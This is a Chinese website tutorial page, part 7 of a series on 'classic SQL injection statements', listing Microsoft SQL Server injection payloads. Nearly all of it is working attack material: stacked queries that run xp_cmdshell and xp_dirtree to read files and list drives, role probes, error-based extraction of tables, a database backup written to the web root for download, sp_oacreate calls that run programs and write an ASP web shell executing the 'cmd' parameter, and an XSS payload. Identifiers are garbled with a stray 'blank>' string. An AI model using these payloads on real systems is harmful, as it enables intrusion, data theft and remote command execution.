超详细SQL经典注入语句(7)_建站学-个人建站指南,网页制作,网站设计,网站制作教程

遍历目录的方法：先创建一个临时表：temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_blank>_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- （xp_blank>_dirtree适用权限PUBLIC）
写入表：
语句1：and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));--
语句2：and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));--
语句3：and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));--
语句4：and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
语句5：and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
语句6：and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));--
语句7：and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
语句8：and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
语句9：and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));--

把路径写到表中去：
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--

把_blank>数据库备份到网页目录：下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:\web\down.bak;--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end

declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>

declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05

; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--

xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表，这里建的表是和上面xp_blank>_dirtree相关连，字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,一步步达到我们想要的信息
unicode <div style="{left:expRessioN (alert('xss'))}"

(责任编辑：admin)

搜索

热门标签:

超详细SQL经典注入语句(7)